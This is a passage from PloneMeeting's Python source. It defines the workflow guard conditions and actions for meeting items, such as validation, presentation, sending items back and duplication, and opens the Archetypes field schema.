_checkPermission(ReviewPortalContent, self.context):\n            suffix = self.cfg.getItemWFValidationLevels(\n                states=[destinationState], data='suffix', only_enabled=True)\n            group_managing_item_uid = self.context.adapted()._getGroupManagingItem(destinationState)\n            # check if next validation level suffixed Plone group is not empty\n            res = self.tool.group_is_not_empty(group_managing_item_uid, suffix)\n            # shortcuts are available to (Meeting)Managers\n            if res and not self.tool.isManager(self.cfg):\n                # check that when using shortcuts, this is available\n                res = self._mayShortcutToValidationLevel(destinationState)\n            # check required data only if transition is doable or we would display\n            # a No button for a transition that is actually not triggerable...\n            if res:\n                msg = self._check_required_data(destinationState)\n                if msg is not None:\n                    res = msg\n        return res\n\n    def _has_waiting_advices_transitions(self):\n        '''Are there 'wait_advices_' transitions from current state and\n           are there advices to wait for, aka would the transition be available?'''\n        res = False\n        if 'waiting_advices_given_advices_required_to_validate' in \\\n           self.cfg.getWorkflowAdaptations():\n            wf_tool = api.portal.get_tool('portal_workflow')\n            item_wf = wf_tool.getWorkflowsFor(self.context)[0]\n            transitions = item_wf.states[self.review_state].transitions\n            wait_advices_transitions = [tr for tr in transitions\n                                        if tr.startswith('wait_advices_')]\n            for wait_advices_tr in wait_advices_transitions:\n                if self._hasAdvicesToGive(item_wf.transitions[wait_advices_tr].new_state_id):\n                    res = True\n                    break\n        return res\n\n    def _get_waiting_advices_icon_advisers(self):\n        '''To be overridden, return adviser ids for which the waiting_advices icon\n           color must be computed.'''\n        return []\n\n    def get_waiting_advices_icon_infos(self):\n        '''Return the advice for which the waiting_advices icon (pretty link)\n           must be managed (red/green/blue).\n           If some advisers returned by _get_waiting_advices_icon_advisers\n           still have their advice giveable in the current state, compute the\n           icon color accordingly.\n           Return icon name and translation msgid.'''\n        res = 'wait_advices_from.png', translate(\n            self.review_state, domain=\"plone\", context=self.context.REQUEST)\n        for adviser_uid in self._get_waiting_advices_icon_advisers():\n            if adviser_uid in self.context.adviceIndex and \\\n               self.context.adviceIndex[adviser_uid]['advice_editable']:\n                # check if advice is up or down WF\n                advice_obj = self.context.getAdviceObj(adviser_uid)\n                down_or_up = down_or_up_wf(advice_obj)\n                if down_or_up:\n                    res = 'wait_advices_{0}_from.png'.format(down_or_up), \\\n                        translate('icon_help_waiting_advices_{0}'.format(down_or_up),\n                                  domain=\"PloneMeeting\",\n                                  context=self.context.REQUEST)\n        return res\n\n    security.declarePublic('mayValidate')\n\n    def mayValidate(self):\n        '''May validate if the user has ReviewPortalContent and the item is at the last validation level.'''\n        res = False\n        if _checkPermission(ReviewPortalContent, self.context):\n            # bypass for Manager, works with adopt_roles\n            if _checkPermission(ManagePortal, self.context):\n                res = True\n            else:\n                # user may validate if he is member of the last validation level suffixed group\n                last_validation_state, last_level = self._getLastValidationState(return_level=True)\n                if self.review_state == last_validation_state or \\\n                    ('item_validation_shortcuts' in self.cfg.getWorkflowAdaptations() and\n                     'item_validation_no_validate_shortcuts' not in self.cfg.getWorkflowAdaptations() and\n                     get_plone_group_id(\n                        self.context.getProposingGroup(),\n                        last_level['suffix']) in get_plone_groups_for_user()):\n                    res = True\n                if self._has_waiting_advices_transitions():\n                    res = No(_('has_required_waiting_advices'))\n                if res:\n                    msg = self._check_required_data('validated')\n                    if msg is not None:\n                        res = msg\n        return res\n\n    security.declarePublic('mayPresent')\n\n    def mayPresent(self):\n        ''' '''\n        # only MeetingManagers may present an item, the 'Review portal content'\n        # permission is not enough as MeetingReviewer may have the 'Review portal content'\n        # when using the 'reviewers_take_back_validated_item' wfAdaptation\n        if not self.tool.isManager(self.cfg):\n            return False\n\n        # if item initial_state is \"validated\", an item could miss its category\n        msg = self._check_required_data('presented')\n        if msg is not None:\n            return msg\n\n        # We may present the item if Plone currently publishes a meeting.\n        # Indeed, an item may only be presented within a meeting.\n        # if we are not on a meeting, try to get the next meeting accepting items\n        if not self._publishedObjectIsMeeting():\n            meeting = self.context.getMeetingToInsertIntoWhenNoCurrentMeetingObject()\n            if not meeting:\n                return No(_('not_able_to_find_meeting_to_present_item_into'))\n\n        # here we are sure that we have a meeting that will accept the item\n        # Verify if all automatic advices have been given on this item.\n        if self.context.enforceAdviceMandatoriness() and \\\n           not self.context.mandatoryAdvicesAreOk():\n            return No(_('mandatory_advice_ko'))\n\n        # all checks passed\n        return True\n\n    security.declarePublic('mayDecide')\n\n    def mayDecide(self):\n        '''May this item be \"decided\" ?'''\n        res = False\n        if _checkPermission(ReviewPortalContent, self.context) and \\\n           self.context.hasMeeting():\n            meeting = self.context.getMeeting()\n            if meeting.date < datetime.now():\n                if not self.context.fieldIsEmpty('decision') or not \\\n                   self.context.fieldIsEmpty('motivation'):\n                    res = True\n                else:\n                    itemNumber = 
self.context.getItemNumber(relativeTo='meeting',\n                                                           for_display=True)\n                    res = No(_('decision_is_empty',\n                               mapping={'itemNumber': itemNumber}))\n        return res\n\n    def _userIsPGMemberAbleToSendItemBack(self, proposing_group_uid, destinationState):\n        ''' '''\n        suffix = self.cfg.getItemWFValidationLevels(\n            states=[destinationState], data='suffix')\n        # first case, is user member of destinationState level?\n        res = self.tool.group_is_not_empty(\n            proposing_group_uid, suffix, user_id=get_current_user_id(self.context.REQUEST))\n        # in case we use shortcuts, we also check if able to go to destinationState\n        # if it was the classic item validation workflow\n        # so a creator could send back to \"itemcreated\" and to \"proposed\"\n        if not res and \\\n           self.tool.group_is_not_empty(proposing_group_uid, suffix) and \\\n           'item_validation_shortcuts' in self.cfg.getWorkflowAdaptations():\n            res = self._mayShortcutToValidationLevel(destinationState)\n\n        return res and \\\n            self._userIsPGMemberAbleToSendItemBackExtraCondition(\n                proposing_group_uid, destinationState)\n\n    def _userIsPGMemberAbleToSendItemBackExtraCondition(\n            self, proposingGroup, destinationState):\n        ''' '''\n        return True\n\n    def _adviceSendableBackOnlyWhenNoMoreEditable(self, org_uid):\n        '''Depending on the advice WF, an advice may be sendable back by the adviser\n           only when the advice is no longer editable.\n           By default this is not the case as the default advice WF has only one\n           state, in which the advice is always editable.'''\n        return False\n\n    def _currentUserIsAdviserAbleToSendItemBack(self, destinationState):\n        '''Is current user an adviser able to send an item 'waiting_advices' back to other states?\n           To do so :\n           - every advice that should be given has to be given;\n           - user must be adviser for advice;\n           - if advice not given, user must be able to evaluate completeness and item must be incomplete.'''\n        user_plone_groups = get_plone_groups_for_user()\n        res = False\n        for org_uid in self.context.adviceIndex:\n            # org can give advice in current state and member is adviser for it\n            # user able to evaluate completeness and item complete or\n            # not able to evaluate completeness but completeness evaluation not required\n            # but advice not editable, this means also advice still not added\n            # this last case is \"not using completeness\"\n            adapted = self.context.adapted()\n            may_eval_completeness = adapted.mayEvaluateCompleteness()\n            if self.review_state in self.cfg.getItemAdviceStatesForOrg(org_uid) and \\\n               get_plone_group_id(org_uid, 'advisers') in user_plone_groups and \\\n               (self.context._advice_is_given(org_uid) or\n                (may_eval_completeness and\n                 not adapted._is_complete()) or\n                (not may_eval_completeness and\n                 self.context.getCompleteness() in ['completeness_evaluation_not_required',\n                                                    'completeness_not_yet_evaluated']) and\n                (not self._adviceSendableBackOnlyWhenNoMoreEditable(org_uid) or\n                 not self.context.adviceIndex[org_uid]['advice_editable'])) and \\\n               self._currentUserIsAdviserAbleToSendItemBackExtraCondition(org_uid, destinationState):\n                res = True\n                break\n        return res\n\n    def _currentUserIsAdviserAbleToSendItemBackExtraCondition(self, org_uid, destinationState):\n        ''' '''\n        return True\n\n    security.declarePublic('mayCorrect')\n\n    def mayCorrect(self, destinationState=None):\n        '''See doc in interfaces.py.'''\n        res = False\n        meeting = self.context.getMeeting()\n        if not meeting or (meeting and meeting.query_state() != 'closed'):\n            proposingGroup = self.context.getProposingGroup()\n            # when item is validated, we may eventually send back to last validation state\n            wfas = 
self.cfg.getWorkflowAdaptations()\n last_val_state, last_level = self._getLastValidationState(return_level=True)\n if self.review_state == 'validated' and destinationState == last_val_state:\n # MeetingManager probably\n if _checkPermission(ReviewPortalContent, self.context):\n res = True\n # manage the reviewers_take_back_validated_item WFAdaptation\n elif 'reviewers_take_back_validated_item' in self.cfg.getWorkflowAdaptations():\n # is current user member of last validation level?\n res = self.tool.group_is_not_empty(\n proposingGroup, last_level['suffix'], user_id=get_current_user_id())\n # using 'waiting_advices_XXX_send_back' WFAdaptations,\n elif self.review_state.endswith('_waiting_advices'):\n item_validation_states = self.cfg.getItemWFValidationLevels(data='state', only_enabled=True)\n # compute sendable back states\n sendable_back_states = []\n # when using from last/before last validation level, able to send back to last level\n if 'waiting_advices_from_before_last_val_level' in wfas:\n sendable_back_states.append(self._getLastValidationState(before_last=True))\n if 'waiting_advices_from_last_val_level' in wfas:\n sendable_back_states.append(last_val_state)\n if 'waiting_advices_from_every_val_levels' in wfas:\n sendable_back_states = list(item_validation_states)\n if not sendable_back_states:\n # use custom values from WAITING_ADVICES_FROM_STATES\n for waiting_advice_config in get_waiting_advices_infos(self.cfg.getId()):\n sendable_back_states += list(waiting_advice_config['back_states'])\n\n # remove duplicates\n sendable_back_states = list(set(sendable_back_states))\n if destinationState in sendable_back_states or \\\n destinationState not in item_validation_states:\n # bypass for Manager, do not check on ReviewPortalContent\n # as also given to proposingGroup\n if self.tool.isManager(self.cfg):\n res = True\n else:\n # is current user proposingGroup member able to trigger transition?\n if 'waiting_advices_proposing_group_send_back' in wfas:\n res = self._userIsPGMemberAbleToSendItemBack(\n proposingGroup, destinationState)\n # if not, maybe it is an adviser able to give an advice?\n if not res and 'waiting_advices_adviser_send_back' in wfas:\n # adviser may send back to validated when using\n # 'waiting_advices_adviser_may_validate'\n if 'waiting_advices_adviser_may_validate' in wfas:\n sendable_back_states.append('validated')\n # is current user adviser able to trigger transition?\n res = self._currentUserIsAdviserAbleToSendItemBack(destinationState)\n else:\n # maybe destinationState is a validation state?\n # in this case return True only if group not empty\n suffix = self.cfg.getItemWFValidationLevels(\n states=[destinationState], data='suffix')\n res = _checkPermission(ReviewPortalContent, self.context) and \\\n (not suffix or self.tool.group_is_not_empty(proposingGroup, suffix))\n return res\n\n security.declarePublic('mayBackToMeeting')\n\n def mayBackToMeeting(self, transitionName):\n \"\"\"Specific guard for the 'return_to_proposing_group' wfAdaptation.\n As we have only one guard_expr for potentially several transitions departing\n from the 'returned_to_proposing_group' state, we receive the p_transitionName.\"\"\"\n if not _checkPermission(ReviewPortalContent, self.context) and not \\\n self.tool.isManager(self.cfg):\n return\n # when using validation states, may return when in last validation state\n if 'return_to_proposing_group' not in self.cfg.getWorkflowAdaptations():\n current_validation_state = 'itemcreated' \\\n if self.review_state == 
'returned_to_proposing_group' \\\n                else self.review_state.replace('returned_to_proposing_group_', '')\n            last_val_state = self._getLastValidationState()\n            # we are in last validation state, or we are in state 'returned_to_proposing_group'\n            # and there is no last validation state, aka it is \"itemcreated\"\n            if current_validation_state != last_val_state:\n                return\n\n        # get the linked meeting\n        meeting = self.context.getMeeting()\n        meetingState = meeting.query_state()\n        # use RETURN_TO_PROPOSING_GROUP_MAPPINGS to know in which meetingStates\n        # the given p_transitionName can be triggered\n        authorizedMeetingStates = RETURN_TO_PROPOSING_GROUP_MAPPINGS[transitionName]\n        # special behavior when using WFA 'itemdecided', back to itemfrozen\n        # may only be done if meeting in state 'frozen'\n        if 'itemdecided' in self.cfg.getWorkflowAdaptations() and \\\n           transitionName == 'backTo_itemfrozen_from_returned_to_proposing_group':\n            authorizedMeetingStates = ['frozen']\n        if meetingState in authorizedMeetingStates:\n            return True\n        # if we did not return True, then return a No(...) message specifying that\n        # it can no longer be returned to the meeting because the meeting is in some\n        # specific states (like 'closed' for example)\n        if meetingState in RETURN_TO_PROPOSING_GROUP_MAPPINGS['NO_MORE_RETURNABLE_STATES']:\n            # avoid displaying the No(...) message for each transition having the 'mayBackToMeeting'\n            # guard expr, just return the No(...) msg for the first transitionName checking this...\n            if 'may_not_back_to_meeting_warned_by' not in self.context.REQUEST:\n                self.context.REQUEST.set('may_not_back_to_meeting_warned_by', transitionName)\n            if self.context.REQUEST.get('may_not_back_to_meeting_warned_by') == transitionName:\n                return No(_('can_not_return_to_meeting_because_of_meeting_state',\n                            mapping={'meetingState': translate(\n                                meetingState,\n                                domain='plone',\n                                context=self.context.REQUEST)}))\n        return False\n\n    security.declarePublic('mayFreeze')\n\n    def mayFreeze(self):\n        res = False\n        if _checkPermission(ReviewPortalContent, self.context):\n            meeting = self.context.getMeeting()\n            if meeting and meeting.query_state() not in get_states_before(meeting, 'frozen'):\n                res = True\n        return res\n\n    security.declarePublic('mayPublish')\n\n    def mayPublish(self):\n        res = False\n        if _checkPermission(ReviewPortalContent, self.context):\n            meeting = self.context.getMeeting()\n            if meeting.query_state() not in get_states_before(meeting, 'published'):\n                res = True\n        return res\n\n    security.declarePublic('mayItemDecide')\n\n    def mayItemDecide(self):\n        res = False\n        if _checkPermission(ReviewPortalContent, self.context):\n            meeting = self.context.getMeeting()\n            if meeting.query_state() not in get_states_before(meeting, 'decided'):\n                res = True\n        return res\n\n    security.declarePublic('mayReturnToProposingGroup')\n\n    def mayReturnToProposingGroup(self):\n        res = False\n        if _checkPermission(ReviewPortalContent, self.context):\n            res = True\n        return res\n\n    security.declarePublic('isLateFor')\n\n    def isLateFor(self, meeting):\n        '''See doc in interfaces.py.'''\n        if meeting:\n            preferred_meeting = self.context.getPreferredMeeting(theObject=True)\n            if preferred_meeting and \\\n               meeting.is_late() and \\\n               meeting.date >= preferred_meeting.date:\n                return True\n        return False\n\n    def _advice_is_to_give(self, adviceInfo):\n        \"\"\" \"\"\"\n        res = False\n        if adviceInfo['type'] in (NOT_GIVEN_ADVICE_VALUE, 'asked_again', ):\n            res = True\n        elif \"waiting_advices_given_and_signed_advices_required_to_validate\" in \\\n                
self.cfg.getWorkflowAdaptations():\n            # check that the WF went to the last advice WF state\n            # and also if advice was asked again, that last time it was asked\n            # it went to the end as well\n            advice_obj = self.context.getAdviceObj(adviceInfo['id'])\n            # bypass if it is not a finances advice\n            if advice_obj.portal_type.startswith('meetingadvicefinances'):\n                # when using the advice WF with signed, the WF transition is \"signFinancialAdvice\"\n                # we will get the last 'signed' or 'asked again' step if one exists\n                last_step = getLastWFAction(\n                    advice_obj, ['signFinancialAdvice', 'backToAdviceInitialState'])\n                if not last_step or last_step['action'] != 'signFinancialAdvice':\n                    res = True\n        return res\n\n    def _hasAdvicesToGive(self, destination_state):\n        \"\"\"Check if there are advices to give in p_destination_state.\"\"\"\n        hasAdvicesToGive = False\n        for org_uid, adviceInfo in self.context.adviceIndex.items():\n            # only consider advices to give\n            if not self._advice_is_to_give(adviceInfo):\n                continue\n            adviceStates = self.cfg.getItemAdviceStatesForOrg(org_uid)\n            if destination_state in adviceStates:\n                hasAdvicesToGive = True\n                break\n        return hasAdvicesToGive\n\n    security.declarePublic('mayWait_advices')\n\n    def mayWait_advices(self, from_state, destination_state):\n        \"\"\" \"\"\"\n        # when using the 'waiting_advices_from_XXX' WFAdaptation\n        # either from last_level, or from every level\n        # only the last validation level may ask advices\n        res = False\n        # bypass for Manager\n        if _checkPermission(ManagePortal, self.context):\n            res = True\n        elif _checkPermission(ReviewPortalContent, self.context):\n            msg = self._check_required_data(destination_state)\n            if msg is not None:\n                res = msg\n            else:\n                wfas = self.cfg.getWorkflowAdaptations()\n                from_states = []\n                if 'waiting_advices' in wfas:\n                    if 'waiting_advices_from_last_val_level' in wfas:\n                        from_states.append(self._getLastValidationState())\n                    if 'waiting_advices_from_before_last_val_level' in wfas:\n                        from_states.append(self._getLastValidationState(before_last=True))\n                    if 'waiting_advices_from_every_val_levels' in wfas:\n                        item_validation_states = self.cfg.getItemWFValidationLevels(\n                            data='state', only_enabled=True)\n                        from_states = list(item_validation_states)\n                    if not from_states:\n                        # use custom values from WAITING_ADVICES_FROM_STATES\n                        for waiting_advice_config in get_waiting_advices_infos(self.cfg.getId()):\n                            from_states += list(waiting_advice_config['from_states'])\n                    if from_state in from_states:\n                        res = True\n                    if res and not self._hasAdvicesToGive(destination_state):\n                        # check if there are advices to give in destination state\n                        res = No(_('advice_required_to_ask_advices'))\n        return res\n\n    security.declarePublic('mayAccept_out_of_meeting')\n\n    def mayAccept_out_of_meeting(self):\n        \"\"\" \"\"\"\n        res = False\n        if self.context.getIsAcceptableOutOfMeeting():\n            if _checkPermission(ReviewPortalContent, self.context) and self.tool.isManager(self.cfg):\n                res = True\n        return res\n\n    security.declarePublic('mayAccept_out_of_meeting_emergency')\n\n    def mayAccept_out_of_meeting_emergency(self):\n        \"\"\" \"\"\"\n        res = False\n        if self.context.getIsAcceptableOutOfMeeting() and \\\n           _checkPermission(ReviewPortalContent, self.context) and \\\n           self.tool.isManager(self.cfg):\n            emergency = self.context.getEmergency()\n            if emergency == 'emergency_accepted':\n                res = True\n            # if emergency has at least been asked, then return a No message\n            elif emergency != 'no_emergency':\n                res = No(_('emergency_accepted_required_to_accept_out_of_meeting_emergency'))\n        return res\n\n    
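# mayTransfer simply delegates to the adapted() item so custom profiles may plug in their own condition\n    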
security.declarePublic('mayTransfer')\n\n    def mayTransfer(self):\n        \"\"\" \"\"\"\n        return self.context.adapted().mayTransfer()\n\n\nInitializeClass(MeetingItemWorkflowConditions)\n\n\nclass MeetingItemWorkflowActions(object):\n    '''Adapts a meeting item to interface IMeetingItemWorkflowActions.'''\n    implements(IMeetingItemWorkflowActions)\n    security = ClassSecurityInfo()\n\n    def __init__(self, item):\n        self.context = item\n        self.tool = api.portal.get_tool('portal_plonemeeting')\n        self.cfg = self.tool.getMeetingConfig(self.context)\n\n    def _getCustomActionName(self, transitionId):\n        \"\"\" \"\"\"\n        action = None\n        if transitionId in self.cfg.getItemWFValidationLevels(\n                data='leading_transition', only_enabled=True):\n            action = 'doProposeToNextValidationLevel'\n        elif transitionId.startswith('wait_advices_from'):\n            action = 'doWait_advices_from'\n        elif transitionId.startswith('goTo_returned_to_proposing_group'):\n            action = 'doGoTo_returned_to_proposing_group'\n        return action\n\n    security.declarePrivate('doActivate')\n\n    def doActivate(self, stateChange):\n        \"\"\"Used for items in config.\"\"\"\n        pass\n\n    security.declarePrivate('doDeactivate')\n\n    def doDeactivate(self, stateChange):\n        \"\"\"Used for items in config.\"\"\"\n        pass\n\n    security.declarePrivate('doProposeToNextValidationLevel')\n\n    def doProposeToNextValidationLevel(self, stateChange):\n        \"\"\"Called by every item validation level defined\n           in MeetingConfig.itemWFValidationLevels.\"\"\"\n        pass\n\n    security.declarePrivate('doValidate')\n\n    def doValidate(self, stateChange):\n        # If it is a \"late\" item, we must potentially send a mail to warn MeetingManagers.\n        preferredMeetingUID = self.context.getPreferredMeeting()\n        if preferredMeetingUID != ITEM_NO_PREFERRED_MEETING_VALUE:\n            meeting = uuidToObject(preferredMeetingUID)\n            if meeting and self.context.wfConditions().isLateFor(meeting):\n                return sendMailIfRelevant(\n                    self.context, 'lateItem', 'meetingmanagers', isSuffix=True)\n\n    def _forceInsertNormal(self):\n        \"\"\" \"\"\"\n        return bool(self.context.REQUEST.cookies.get('pmForceInsertNormal', 'false') == 'true')\n\n    security.declarePrivate('doPresent')\n\n    def doPresent(self, stateChange):\n        '''Presents an item into a meeting.'''\n        meeting = getCurrentMeetingObject(self.context)\n        # if we were not on a meeting view, we will present\n        # the item in the next available meeting\n        if not meeting:\n            # find meetings accepting items in the future\n            meeting = self.context.getMeetingToInsertIntoWhenNoCurrentMeetingObject()\n        # insert the item into the meeting\n        self._insertItem(meeting)\n        # We may have to send a mail.\n        sendMailIfRelevant(self.context, 'itemPresented', 'creators', isSuffix=True)\n        sendMailIfRelevant(self.context, 'itemPresentedOwner', 'Owner', isRole=True)\n\n    def _insertItem(self, meeting):\n        \"\"\" \"\"\"\n        self.context.REQUEST.set('currentlyInsertedItem', self.context)\n        meeting.insert_item(self.context, force_normal=self._forceInsertNormal())\n        # If the meeting is already in a late state and this item is a \"late\" item,\n        # I must automatically set the item to the first \"late state\" (itemfrozen by default).\n        if meeting.is_late():\n            do_transitions(self.context, self._latePresentedItemTransitions())\n\n    def _latePresentedItemTransitions(self):\n        \"\"\"Return the transitions to execute on a late item.\n           By default, this will freeze, publish or decide the item.\"\"\"\n        # we can not base this on MeetingConfig.onMeetingTransitionItemActionToExecute\n        # because sometimes for performance reasons, freezing items when\n        # 
freezing the meeting is disabled but we want a late item to be auto frozen...\n        return ('itemfreeze', 'itempublish', 'itemdecide')\n\n    security.declarePrivate('doItemFreeze')\n\n    def doItemFreeze(self, stateChange):\n        pass\n\n    security.declarePrivate('doItemPublish')\n\n    def doItemPublish(self, stateChange):\n        pass\n\n    security.declarePrivate('doItemDecide')\n\n    def doItemDecide(self, stateChange):\n        pass\n\n    security.declarePrivate('doAccept_out_of_meeting')\n\n    def doAccept_out_of_meeting(self, stateChange):\n        \"\"\"Duplicate item to validated if WFAdaptation\n           'accepted_out_of_meeting_and_duplicated' is used.\"\"\"\n        if 'accepted_out_of_meeting_and_duplicated' in self.cfg.getWorkflowAdaptations():\n            new_item = self._duplicateAndValidate(\n                cloneEventAction='create_from_accepted_out_of_meeting')\n            # make sure new_item is no longer isAcceptableOutOfMeeting\n            # when auto duplicated, new item is supposed to be presented in a next meeting\n            new_item.setIsAcceptableOutOfMeeting(False)\n        self.context.update_item_reference()\n\n    security.declarePrivate('doAccept_out_of_meeting_emergency')\n\n    def doAccept_out_of_meeting_emergency(self, stateChange):\n        \"\"\"Duplicate item to validated if WFAdaptation\n           'accepted_out_of_meeting_emergency_and_duplicated' is used.\"\"\"\n        if 'accepted_out_of_meeting_emergency_and_duplicated' in self.cfg.getWorkflowAdaptations():\n            new_item = self._duplicateAndValidate(\n                cloneEventAction='create_from_accepted_out_of_meeting_emergency')\n            # make sure new_item is no longer isAcceptableOutOfMeeting\n            # when auto duplicated, new item is supposed to be presented in a next meeting\n            new_item.setIsAcceptableOutOfMeeting(False)\n\n        self.context.update_item_reference()\n\n    security.declarePrivate('doTransfer')\n\n    def doTransfer(self, stateChange):\n        \"\"\"Duplicate item to validated if WFAdaptation\n           'transfered_and_duplicated' is used.\"\"\"\n        if 'transfered_and_duplicated' in self.cfg.getWorkflowAdaptations():\n            self._duplicateAndValidate(cloneEventAction='create_from_transfered')\n        self.context.update_item_reference()\n\n    security.declarePrivate('doAccept')\n\n    def doAccept(self, stateChange):\n        pass\n\n    security.declarePrivate('doRefuse')\n\n    def doRefuse(self, stateChange):\n        pass\n\n    security.declarePrivate('doMark_not_applicable')\n\n    def doMark_not_applicable(self, stateChange):\n        pass\n\n    security.declarePrivate('doRemove')\n\n    def doRemove(self, stateChange):\n        # duplicate item if necessary\n        if 'removed_and_duplicated' in self.cfg.getWorkflowAdaptations():\n            creator = self.context.Creator()\n            # We create a copy in the initial item state, in the folder of creator.\n            self.context.clone(copyAnnexes=True,\n                               newOwnerId=creator,\n                               cloneEventAction='create_from_removed_item',\n                               keepProposingGroup=True,\n                               setCurrentAsPredecessor=True)\n\n    def _duplicateAndValidate(self, cloneEventAction):\n        \"\"\"Duplicate self.context, keep the link with it and validate the new item.\"\"\"\n        creator = self.context.Creator()\n        # We create a copy in the initial item state, in the folder of creator.\n        clonedItem = self.context.clone(copyAnnexes=True,\n                                        newOwnerId=creator,\n                                        cloneEventAction=cloneEventAction,\n                                        keepProposingGroup=True,\n                                        setCurrentAsPredecessor=True,\n                                        inheritAdvices=True)\n        # set clonedItem to state 'validated'\n        wfTool = api.portal.get_tool('portal_workflow')\n        wf_comment = _('wf_transition_triggered_by_application')\n        with api.env.adopt_roles(roles=['Manager']):\n            # trigger transitions until 'validated', aka one step before 'presented'\n            # set a special value in the REQUEST so 
guards may use it if necessary\n            self.context.REQUEST.set('duplicating_and_validating_item', True)\n            # try to bypass by using the \"validate\" shortcut\n            if \"validate\" in get_transitions(clonedItem):\n                wfTool.doActionFor(clonedItem, \"validate\")\n            else:\n                for tr in self.cfg.getTransitionsForPresentingAnItem(\n                        org_uid=clonedItem.getProposingGroup())[0:-1]:\n                    if tr in get_transitions(clonedItem):\n                        wfTool.doActionFor(clonedItem, tr, comment=wf_comment)\n            self.context.REQUEST.set('duplicating_and_validating_item', False)\n        return clonedItem\n\n    security.declarePrivate('doPostpone_next_meeting')\n\n    def doPostpone_next_meeting(self, stateChange):\n        '''When an item is 'postponed_next_meeting', we will duplicate it:\n           the copy is automatically validated and will be linked to this one.'''\n        clonedItem = self._duplicateAndValidate(cloneEventAction='create_from_postponed_next_meeting')\n        # Send, if configured, a mail to the person who created the item\n        sendMailIfRelevant(clonedItem, 'itemPostponedNextMeeting', 'creators', isSuffix=True)\n\n    security.declarePrivate('doDelay')\n\n    def doDelay(self, stateChange):\n        '''When an item is delayed, we will duplicate it: the copy is back to\n           the initial state and will be linked to this one.'''\n        creator = self.context.Creator()\n        # We create a copy in the initial item state, in the folder of creator.\n        clonedItem = self.context.clone(copyAnnexes=True,\n                                        newOwnerId=creator,\n                                        cloneEventAction='create_from_predecessor',\n                                        keepProposingGroup=True,\n                                        setCurrentAsPredecessor=True)\n        # Send, if configured, a mail to the person who created the item\n        sendMailIfRelevant(clonedItem, 'itemDelayed', 'creators', isSuffix=True)\n        sendMailIfRelevant(clonedItem, 'itemDelayedOwner', 'Owner', isRole=True)\n\n    def _get_item_states_removed_from_meeting(self):\n        '''Return item states in which an item is considered removed from a meeting.\n           By default, when using MeetingConfig.itemWFValidationStates, these are\n           the states in which the item is no longer linked to a meeting.'''\n        res = self.cfg.getItemWFValidationLevels(data='state', only_enabled=True)\n        res.append('validated')\n        return res\n\n    security.declarePrivate('doCorrect')\n\n    def doCorrect(self, stateChange):\n        \"\"\"\n        This is a unique wf action called for every transition beginning with 'backTo'.\n        Most of the time we do nothing, but in some cases we check the old/new state and\n        do some specific treatment.\n        \"\"\"\n        meeting = self.context.getMeeting()\n        # Remove item from meeting if necessary when going to a state\n        # where item is not linked to a meeting\n        if meeting and stateChange.new_state.id in self._get_item_states_removed_from_meeting():\n            # We may have to send a mail\n            sendMailIfRelevant(self.context, 'itemUnpresented', 'creators', isSuffix=True)\n            sendMailIfRelevant(self.context, 'itemUnpresentedOwner', 'Owner', isRole=True)\n            # remove the item from the meeting\n            self.context.getMeeting().remove_item(self.context)\n        # back to validated from \"accepted_out_of_meeting\"\n        if stateChange.new_state.id == \"validated\" and self.context.getItemReference():\n            self.context.update_item_reference(clear=True)\n        # if an item was returned to proposing group for corrections and\n        # this proposing group sends the item back to the meeting managers, we\n        # send an email to warn the MeetingManagers if relevant\n        if stateChange.old_state.id.startswith(\"returned_to_proposing_group\"):\n            # We may have to send a mail.\n            sendMailIfRelevant(self.context, 'returnedToMeetingManagers', 'meetingmanagers', isSuffix=True)\n\n        if 
'decide_item_when_back_to_meeting_from_returned_to_proposing_group' in self.cfg.getWorkflowAdaptations() \\\n and stateChange.transition.getId() == 'backTo_itemfrozen_from_returned_to_proposing_group' \\\n and self.context.getMeeting().query_state() == 'decided':\n with api.env.adopt_roles(roles=['Manager']):\n wTool = api.portal.get_tool('portal_workflow')\n from config import ITEM_TRANSITION_WHEN_RETURNED_FROM_PROPOSING_GROUP_AFTER_CORRECTION\n wf_comment = _('wf_transition_triggered_by_application')\n if 'no_publication' not in self.cfg.getWorkflowAdaptations():\n wTool.doActionFor(self.context, 'itempublish', comment=wf_comment)\n wTool.doActionFor(self.context,\n ITEM_TRANSITION_WHEN_RETURNED_FROM_PROPOSING_GROUP_AFTER_CORRECTION,\n comment=wf_comment)\n\n security.declarePrivate('doReturn_to_proposing_group')\n\n def doReturn_to_proposing_group(self, stateChange):\n '''Send an email when returned to proposing group if relevant...'''\n sendMailIfRelevant(self.context, 'returnedToProposingGroup', 'creators', isSuffix=True)\n sendMailIfRelevant(self.context, 'returnedToProposingGroupOwner', 'Owner', isRole=True)\n\n security.declarePrivate('doGoTo_returned_to_proposing_group_proposed')\n\n def doGoTo_returned_to_proposing_group_proposed(self, stateChange):\n pass\n\n security.declarePrivate('doGoTo_returned_to_proposing_group')\n\n def doGoTo_returned_to_proposing_group(self, stateChange):\n pass\n\n security.declarePrivate('doWait_advices_from')\n\n def doWait_advices_from(self, stateChange):\n pass\n\n security.declarePrivate('doAccept_but_modify')\n\n def doAccept_but_modify(self, stateChange):\n pass\n\n security.declarePrivate('doPre_accept')\n\n def doPre_accept(self, stateChange):\n pass\n\n\nInitializeClass(MeetingItemWorkflowActions)\n\nschema = Schema((\n\n IntegerField(\n name='itemNumber',\n widget=IntegerField._properties['widget'](\n visible=False,\n label='Itemnumber',\n label_msgid='PloneMeeting_label_itemNumber',\n i18n_domain='PloneMeeting',\n ),\n ),\n StringField(\n name='itemReference',\n widget=StringWidget(\n visible=False,\n label='Itemreference',\n label_msgid='PloneMeeting_label_itemReference',\n i18n_domain='PloneMeeting',\n ),\n searchable=True,\n ),\n TextField(\n name='description',\n widget=RichWidget(\n label_msgid=\"PloneMeeting_label_itemDescription\",\n label='Description',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n searchable=True,\n allowable_content_types=('text/html',),\n default_output_type=\"text/x-html-safe\",\n accessor=\"Description\",\n optional=True,\n ),\n TextField(\n name='detailedDescription',\n allowable_content_types=('text/html',),\n widget=RichWidget(\n condition=\"python: here.attribute_is_used('detailedDescription')\",\n label='Detaileddescription',\n label_msgid='PloneMeeting_label_detailedDescription',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n searchable=True,\n default_output_type=\"text/x-html-safe\",\n optional=True,\n ),\n BooleanField(\n name='budgetRelated',\n widget=BooleanField._properties['widget'](\n condition=\"python: here.show_budget_infos()\",\n description=\"BudgetRelated\",\n description_msgid=\"item_budget_related_descr\",\n label='Budgetrelated',\n label_msgid='PloneMeeting_label_budgetRelated',\n i18n_domain='PloneMeeting',\n ),\n read_permission=ReadBudgetInfos,\n write_permission=WriteBudgetInfos,\n ),\n 